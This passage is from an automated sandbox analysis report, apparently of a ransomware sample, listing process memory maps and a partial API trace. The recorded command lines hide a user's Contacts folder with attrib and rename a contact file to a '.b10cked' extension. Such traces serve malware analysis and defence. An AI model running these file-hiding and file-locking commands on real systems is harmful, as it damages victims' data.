entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32627 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32628 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32629 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 32630 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 32631 start_va = 0x71e50000 end_va = 0x71e6cfff entry_point = 0x71e50000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 32632 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32633 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 32634 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32635 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32636 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 32637 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32638 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32639 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32640 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 32641 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32642 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32643 start_va = 0x170000 end_va = 0x237fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 32644 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32645 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 766 os_tid = 0x64 Process: id = "563" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16d40" os_pid = "0x62c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "561" os_parent_pid = "0xe3c" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32646 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32647 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32648 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32649 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 32650 start_va = 0x440000 end_va = 0x446fff entry_point = 0x440000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 32651 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32652 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32653 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32654 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 32655 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32656 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32657 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32658 start_va = 0x80000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 32659 start_va = 0x100000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 32660 start_va = 0x200000 end_va = 0x266fff entry_point = 0x200000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32661 start_va = 0x71e30000 end_va = 0x71e4cfff entry_point = 0x71e30000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 32662 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32663 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 32664 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32665 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32666 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 32667 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32668 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32669 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32670 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 32671 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32672 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32673 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 32674 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32675 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 767 os_tid = 0xca0 Process: id = "564" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16cc0" os_pid = "0xfd0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "561" os_parent_pid = "0xe3c" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Contacts\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32676 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32677 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32678 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32679 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 32680 start_va = 0x6c0000 end_va = 0x6c6fff entry_point = 0x6c0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 32681 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32682 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32683 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32684 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 32685 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32686 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32687 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32688 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32689 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 32690 start_va = 0x4b0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 32691 start_va = 0x71e50000 end_va = 0x71e6cfff entry_point = 0x71e50000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 32692 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32693 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 32694 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32695 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32696 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 32697 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32698 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32699 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32700 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 32701 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32702 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32703 start_va = 0x340000 end_va = 0x407fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 32704 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32705 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 768 os_tid = 0xe70 Process: id = "565" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16600" os_pid = "0x698" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\IHNVBH~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32718 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32719 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32720 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32721 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 32722 start_va = 0x49fe0000 end_va = 0x4a02bfff entry_point = 0x49fe0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32723 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32724 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32725 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32726 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 32727 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32728 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32729 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32730 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32731 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 32732 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 32733 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 32734 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32735 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32736 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32737 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32738 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32739 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32740 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32741 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32742 start_va = 0x3e0000 end_va = 0x4a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 32743 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32744 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 32745 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 32746 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 32747 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 32748 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 32749 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 32750 start_va = 0x600000 end_va = 0x11fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 32751 start_va = 0x1200000 end_va = 0x1362fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Thread: id = 769 os_tid = 0x514 [0218.563] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fc4c | out: lpSystemTimeAsFileTime=0x24fc4c*(dwLowDateTime=0xb7123f00, dwHighDateTime=0x1d440a9)) [0218.563] GetCurrentProcessId () returned 0x698 [0218.563] GetCurrentThreadId () returned 0x514 [0218.563] GetTickCount () returned 0x3d104 [0218.563] QueryPerformanceCounter (in: lpPerformanceCount=0x24fc44 | out: lpPerformanceCount=0x24fc44*=27535222876) returned 1 [0218.564] GetModuleHandleA (lpModuleName=0x0) returned 0x49fe0000 [0218.564] __set_app_type (_Type=0x1) [0218.564] __p__fmode () returned 0x76b331f4 [0218.564] __p__commode () returned 0x76b331fc [0218.564] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a0021a6) returned 0x0 [0218.564] __getmainargs (in: _Argc=0x4a004238, _Argv=0x4a004240, _Env=0x4a00423c, _DoWildCard=0, _StartInfo=0x4a004140 | out: _Argc=0x4a004238, _Argv=0x4a004240, _Env=0x4a00423c) returned 0 [0218.564] GetCurrentThreadId () returned 0x514 [0218.564] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x514) returned 0x38 [0218.564] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0218.564] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0218.564] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.565] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0218.565] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24fbdc | out: phkResult=0x24fbdc*=0x0) returned 0x2 [0218.565] VirtualQuery (in: lpAddress=0x24fc13, lpBuffer=0x24fbac, dwLength=0x1c | out: lpBuffer=0x24fbac*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0218.565] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24fbac, dwLength=0x1c | out: lpBuffer=0x24fbac*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0218.565] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24fbac, dwLength=0x1c | out: lpBuffer=0x24fbac*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0218.565] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24fbac, dwLength=0x1c | out: lpBuffer=0x24fbac*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0218.565] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24fbac, dwLength=0x1c | out: lpBuffer=0x24fbac*(BaseAddress=0x250000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x90000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0218.565] GetConsoleOutputCP () returned 0x1b5 [0218.565] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a004260 | out: lpCPInfo=0x4a004260) returned 1 [0218.565] SetConsoleCtrlHandler (HandlerRoutine=0x49ffe72a, Add=1) returned 1 [0218.565] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.565] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0218.565] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.565] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a0041ac | out: lpMode=0x4a0041ac) returned 1 [0218.566] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.566] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0218.566] _get_osfhandle (_FileHandle=0) returned 0x3 [0218.566] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a0041b0 | out: lpMode=0x4a0041b0) returned 1 [0218.566] _get_osfhandle (_FileHandle=0) returned 0x3 [0218.566] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0218.566] GetEnvironmentStringsW () returned 0x2f0180* [0218.566] FreeEnvironmentStringsW (penv=0x2f0180) returned 1 [0218.567] GetEnvironmentStringsW () returned 0x2f0180* [0218.567] FreeEnvironmentStringsW (penv=0x2f0180) returned 1 [0218.567] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24eb4c | out: phkResult=0x24eb4c*=0x40) returned 0x0 [0218.567] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24eb54, lpData=0x24eb58, lpcbData=0x24eb50*=0x1000 | out: lpType=0x24eb54*=0x0, lpData=0x24eb58*=0xa8, lpcbData=0x24eb50*=0x1000) returned 0x2 [0218.567] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24eb54, lpData=0x24eb58, lpcbData=0x24eb50*=0x1000 | out: lpType=0x24eb54*=0x4, lpData=0x24eb58*=0x1, lpcbData=0x24eb50*=0x4) returned 0x0 [0218.567] RegQueryValueExW (in: 